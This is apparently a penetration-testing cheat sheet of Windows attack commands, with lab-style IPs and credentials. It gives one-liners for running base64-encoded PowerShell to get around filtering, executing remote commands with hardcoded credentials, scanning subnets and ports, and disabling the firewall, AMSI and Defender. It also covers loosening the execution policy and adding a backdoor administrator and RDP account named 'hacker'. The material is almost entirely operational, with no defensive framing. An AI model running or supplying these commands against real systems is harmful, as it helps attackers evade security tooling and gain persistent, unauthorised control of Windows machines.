#Windows Tricks

#PowerShell encoded base64

Create a base64 payload to avoid bad characters.

# Create the command to PowerShell execute
$ echo -n 'ping -n 2 10.10.14.2' | iconv -t utf-16le | base64 -w 0
cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==

# Run PowerShell with Encoded flag
Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==

#Run command as User (with creds)

$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("disco\\Alice", $pass)
Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}

#List running process with args


WMIC path win32_process get Caption,Processid,Commandline

#Scan for hosts and open ports in subnet

# Scan for Hosts in Subnet
PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue}

# Scan for open Ports
PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.2.101",$)) "Port $ is open!"} 2>$null

#PowerShell

# PowerShell Directory
c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

# FIX THE VARIABLE PATH
set PATH=%SystemRoot%\system32;%SystemRoot%;

#Search for files

Get-Childitem –Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue

#Windows Security

#Disable Firewall


NetSh Advfirewall set allprofiles state off

#Disable AMSI

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

#Disable Defender


sc stop WinDefend

#Execution Policy

Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser

#Add a RDP user

net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD